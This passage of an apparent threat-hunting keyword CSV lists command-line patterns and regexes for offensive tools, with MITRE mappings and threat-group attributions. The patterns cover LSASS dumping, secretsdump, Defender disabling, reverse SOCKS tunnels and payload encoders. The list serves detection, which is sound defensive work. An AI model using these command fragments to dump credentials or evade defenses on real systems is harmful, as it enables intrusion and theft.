""(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))*",".{0,1000}\s\-\-search\s\""\(\&\(objectCategory\=user\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=4194304\)\).{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","Users With Kerberos Pre-authentication Disabled - key condition for AS-REP roasting attack.","10","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","3021" "* --search password --from_date * --to_date *",".{0,1000}\s\-\-search\spassword\s\-\-from_date\s.{0,1000}\s\-\-to_date\s.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - 
TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","3022" "* SearchShares.ps1*",".{0,1000}\sSearchShares\.ps1.{0,1000}","offensive_tool_keyword","SearchOpenFileShares","Searches open file shares for password files or database backups - Extend as you see fit","T1083 - T1135 - T1005 - T1025","TA0007 - TA0009","N/A","Dispossessor","Discovery","https://github.com/fashionproof/SearchOpenFileShares","1","0","N/A","N/A","7","1","29","6","2019-12-13T12:37:42Z","2019-09-21T13:50:26Z","3023" "* -seatbelt -Command *",".{0,1000}\s\-seatbelt\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into PowerShell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3024" "* Seatbelt.Commands.Windows*",".{0,1000}\sSeatbelt\.Commands\.Windows.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","3025" "* SeatBelt.exe*",".{0,1000}\sSeatBelt\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","3026" "* seatbelt_json.py*",".{0,1000}\sseatbelt_json\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","3027" "* --seclogon-duplicate*",".{0,1000}\s\-\-seclogon\-duplicate.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","3028" "* secrets found for DPAPI_SYSTEM*",".{0,1000}\ssecrets\sfound\sfor\sDPAPI_SYSTEM.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","3029" "* --secrets-dump -target *",".{0,1000}\s\-\-secrets\-dump\s\-target\s.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","3030" "* secretsdump.py*",".{0,1000}\ssecretsdump\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","3031" "* secretsdump.py*",".{0,1000}\ssecretsdump\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource 
Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","3032" "* secretsmanagerenum.py*",".{0,1000}\ssecretsmanagerenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","3033" "* SecretStealer.ps1*",".{0,1000}\sSecretStealer\.ps1.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","3034" "* self_deletion.exe*",".{0,1000}\sself_deletion\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","3036" "* SendScreenshotToTelegram*",".{0,1000}\sSendScreenshotToTelegram.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","3037" "* SeriousSam.Execute *",".{0,1000}\sSeriousSam\.Execute\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon 
Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","0","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","3038" "* --server * --cert-path *.pfx --elevate --target * --restore *",".{0,1000}\s\-\-server\s.{0,1000}\s\-\-cert\-path\s.{0,1000}\.pfx\s\-\-elevate\s\-\-target\s.{0,1000}\s\-\-restore\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral 
Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","3039" "* --server * --cert-path *.pfx --elevate --target * --sid *",".{0,1000}\s\-\-server\s.{0,1000}\s\-\-cert\-path\s.{0,1000}\.pfx\s\-\-elevate\s\-\-target\s.{0,1000}\s\-\-sid\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","3040" "* --server * --type pass-pols*",".{0,1000}\s\-\-server\s.{0,1000}\s\-\-type\spass\-pols.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","#linux #windows","N/A","5","3","215","36","2024-12-10T17:00:02Z","2019-12-08T00:25:57Z","3041" "* server -p 80 --reverse --socks5*",".{0,1000}\sserver\s\-p\s80\s\-\-reverse\s\-\-socks5.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.","T1071 - T1090 - T1102","N/A","N/A","Black Basta","C2","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3042" "* server --restrict-http-upgrade-path-prefix *wss*",".{0,1000}\sserver\s\-\-restrict\-http\-upgrade\-path\-prefix\s.{0,1000}wss.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - 
TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","3043" "* server wss://[::]:*",".{0,1000}\sserver\swss\:\/\/\[\:\:\]\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","3044" "* server.py -s tornado --cert /*pem --key /*.pem*",".{0,1000}\sserver\.py\s\-s\stornado\s\-\-cert\s\/.{0,1000}pem\s\-\-key\s\/.{0,1000}\.pem.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","3045" "* -ServerUri * -FindAmsiSignatures*",".{0,1000}\s\-ServerUri\s.{0,1000}\s\-FindAmsiSignatures.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","3046" "* service -dump all-services.json*",".{0,1000}\sservice\s\-dump\sall\-services\.json.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - 
menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","3047" "* --service fortynorth*",".{0,1000}\s\-\-service\sfortynorth.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","3048" "* -ServiceName * -PipeName *",".{0,1000}\s\-ServiceName\s.{0,1000}\s\-PipeName\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Get-System.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3051" "* -ServiceName VulnSVC *",".{0,1000}\s\-ServiceName\sVulnSVC\s.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","3052" "* 
servicetags.nse*",".{0,1000}\sservicetags\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3053" "* --session=allrules --wordlist*",".{0,1000}\s\-\-session\=allrules\s\-\-wordlist.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","3054" "* --SessionEnum --Host *",".{0,1000}\s\-\-SessionEnum\s\-\-Host\s.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","3055" "* SessionGopher.ps1*",".{0,1000}\sSessionGopher\.ps1.{0,1000}","offensive_tool_keyword","SessionGopher","uses WMI to extract saved session information for remote access tools such as WinSCP - PuTTY - SuperPuTTY - FileZilla and Microsoft Remote Desktop. 
It can be run remotely or locally.","T1047 - T1003.008 - T1552.004 - T1555.003","TA0006","N/A","PYSA - DarkSide - Sphinx","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","0","N/A","N/A","10","10","1255","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z","3056" "* --set-as-owned smart -bp * kerberos * --kdc-ip *",".{0,1000}\s\-\-set\-as\-owned\ssmart\s\-bp\s.{0,1000}\skerberos\s.{0,1000}\s\-\-kdc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3058" "* Set-MasterBootRecord*",".{0,1000}\sSet\-MasterBootRecord.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3059" "* Set-MpPreference -DisableIOAVProtection *",".{0,1000}\sSet\-MpPreference\s\-DisableIOAVProtection\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","3060" "* SetMzLogonPwd *",".{0,1000}\sSetMzLogonPwd\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. 
which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","3061" "* set-objectowner * -target-sid * -owner-sid *",".{0,1000}\sset\-objectowner\s.{0,1000}\s\-target\-sid\s.{0,1000}\s\-owner\-sid\s.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. 
It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","3062" "* setoolkit*",".{0,1000}\ssetoolkit.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","N/A","10","11798","2922","2024-10-21T15:46:18Z","2012-12-31T22:01:33Z","3063" "* -sgn -syscalls *",".{0,1000}\s\-sgn\s\-syscalls\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation 
tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","3065" "* -sgn -unhook -antidebug *",".{0,1000}\s\-sgn\s\-unhook\s\-antidebug\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","3066" "* sgn.exe -i *",".{0,1000}\ssgn\.exe\s\-i\s.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","3067" "* sgn_linux-arm64*",".{0,1000}\ssgn_linux\-arm64.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/EgeBalci/sgn","1","0","#linux","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","3068" "* shad0w.py*",".{0,1000}\sshad0w\.py.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","3069" "* shadow auto -u * -p * -account *",".{0,1000}\sshadow\sauto\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-account\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","3070" "* -shadowcred -victim *",".{0,1000}\s\-shadowcred\s\-victim\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay 